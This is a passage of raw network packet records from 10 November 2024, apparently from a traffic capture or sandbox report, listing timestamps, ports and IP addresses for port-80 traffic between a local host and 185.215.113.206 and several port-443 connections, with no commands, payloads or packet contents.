Nov 10, 2024 04:55:25.108973026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.108988047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.108990908 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109013081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109026909 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109026909 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109029055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109049082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109066963 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109067917 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109081030 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109088898 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109111071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109117031 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109127998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109141111 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109150887 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109159946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109174013 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109174013 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109184980 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109196901 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109200954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109224081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109226942 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109235048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109251022 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109256983 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109277964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109278917 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109292030 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109304905 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109308004 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109318018 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109322071 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109329939 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109342098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109354019 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109359026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109368086 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109378099 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109380007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109415054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109416962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109430075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109443903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109446049 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109456062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109457970 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109468937 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109479904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109498978 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109510899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109513998 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109522104 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109544039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109560966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109564066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109575987 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109586000 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109595060 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109606981 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109613895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109630108 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109638929 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109642029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109663010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109672070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109680891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109692097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109693050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109705925 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109716892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109724998 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109731913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109741926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109746933 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109760046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109770060 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109781981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109796047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109796047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109811068 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109811068 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109822035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109832048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109853029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109859943 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109872103 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109873056 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109884024 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109910011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109918118 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109918118 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109922886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109934092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109950066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109961987 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109963894 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.109994888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.109996080 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110012054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110019922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110024929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110033035 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110035896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110060930 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110073090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110074043 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110083103 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110084057 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110095024 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110107899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110110998 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110142946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110146999 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110146999 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110155106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110166073 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110182047 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110193968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110198021 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110208035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110219002 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110228062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110248089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110255003 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110260010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110268116 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110270977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110284090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110296011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110306978 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110315084 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110315084 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110335112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110337019 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110348940 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110361099 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110373974 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110373974 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110374928 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110388041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110395908 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110399961 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110428095 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110433102 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110443115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110446930 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110464096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110477924 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110481977 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110491037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110513926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110513926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110534906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110547066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110554934 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110558033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110584974 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110622883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110627890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110637903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110649109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110663891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110676050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110691071 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110691071 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110721111 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110727072 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110733986 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110757113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110769033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110769987 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110780954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110800028 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110812902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110821009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110833883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110841990 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110845089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110858917 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110869884 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110888958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110888958 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110914946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110924006 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110929966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110940933 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110954046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110972881 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.110980034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110994101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.110994101 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111015081 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111017942 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111027956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111040115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111059904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111059904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111071110 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111083031 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111085892 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111094952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111105919 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111108065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111138105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111160040 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111170053 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111181021 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111191034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.111234903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.111234903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.139894962 CET	443	49851	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.140084028 CET	443	49851	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.140141964 CET	49851	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.140177011 CET	49851	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.140181065 CET	443	49851	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.140188932 CET	49851	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.140192986 CET	443	49851	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.142664909 CET	49860	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.142677069 CET	443	49860	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.142743111 CET	49860	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.142862082 CET	49860	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.142872095 CET	443	49860	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.153745890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.153757095 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.153908014 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.184840918 CET	49861	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:25.184860945 CET	443	49861	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:25.184928894 CET	49861	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:25.185170889 CET	49861	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:25.185178995 CET	443	49861	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:25.197951078 CET	49862	443	192.168.2.5	23.198.7.181
Nov 10, 2024 04:55:25.197957993 CET	443	49862	23.198.7.181	192.168.2.5
Nov 10, 2024 04:55:25.198056936 CET	49862	443	192.168.2.5	23.198.7.181
Nov 10, 2024 04:55:25.198996067 CET	49863	443	192.168.2.5	23.198.7.181
Nov 10, 2024 04:55:25.199017048 CET	443	49863	23.198.7.181	192.168.2.5
Nov 10, 2024 04:55:25.199148893 CET	49863	443	192.168.2.5	23.198.7.181
Nov 10, 2024 04:55:25.200886011 CET	49864	443	192.168.2.5	204.79.197.219
Nov 10, 2024 04:55:25.200902939 CET	443	49864	204.79.197.219	192.168.2.5
Nov 10, 2024 04:55:25.200962067 CET	49864	443	192.168.2.5	204.79.197.219
Nov 10, 2024 04:55:25.201862097 CET	49865	443	192.168.2.5	204.79.197.219
Nov 10, 2024 04:55:25.201891899 CET	443	49865	204.79.197.219	192.168.2.5
Nov 10, 2024 04:55:25.201951027 CET	49865	443	192.168.2.5	204.79.197.219
Nov 10, 2024 04:55:25.202142000 CET	49865	443	192.168.2.5	204.79.197.219
Nov 10, 2024 04:55:25.202156067 CET	443	49865	204.79.197.219	192.168.2.5
Nov 10, 2024 04:55:25.203573942 CET	49864	443	192.168.2.5	204.79.197.219
Nov 10, 2024 04:55:25.203583956 CET	443	49864	204.79.197.219	192.168.2.5
Nov 10, 2024 04:55:25.203690052 CET	49863	443	192.168.2.5	23.198.7.181
Nov 10, 2024 04:55:25.203701019 CET	443	49863	23.198.7.181	192.168.2.5
Nov 10, 2024 04:55:25.208579063 CET	49862	443	192.168.2.5	23.198.7.181
Nov 10, 2024 04:55:25.208590984 CET	443	49862	23.198.7.181	192.168.2.5
Nov 10, 2024 04:55:25.217355013 CET	443	49852	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.217497110 CET	443	49852	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.217582941 CET	49852	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.217747927 CET	49852	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.217747927 CET	49852	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.217763901 CET	443	49852	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.217772961 CET	443	49852	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.221451044 CET	49866	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.221460104 CET	443	49866	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.221537113 CET	49866	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.221683025 CET	49866	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.221690893 CET	443	49866	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.224858999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.224893093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.224905968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.224920988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.224946022 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.224953890 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.224953890 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.224958897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225006104 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225047112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225059032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225074053 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225104094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225104094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225131035 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225136042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225142956 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225147009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225173950 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225187063 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225187063 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225191116 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225205898 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225217104 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225229025 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225229025 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225244045 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225250959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225263119 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225275993 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225286007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225311041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225322962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225323915 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225347042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225349903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225362062 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225385904 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225387096 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225395918 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225406885 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225413084 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225423098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225431919 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225435019 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225459099 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225462914 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225475073 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225485086 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225497007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225501060 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225507975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225522041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225526094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225526094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225533962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225545883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225547075 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225555897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225569010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225583076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225586891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225600958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225609064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225626945 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225651026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225665092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225689888 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225703955 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225704908 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.225713968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225725889 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225742102 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225754976 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.225754976 CET	49771	80	192.168.2.5	185.215.113.206
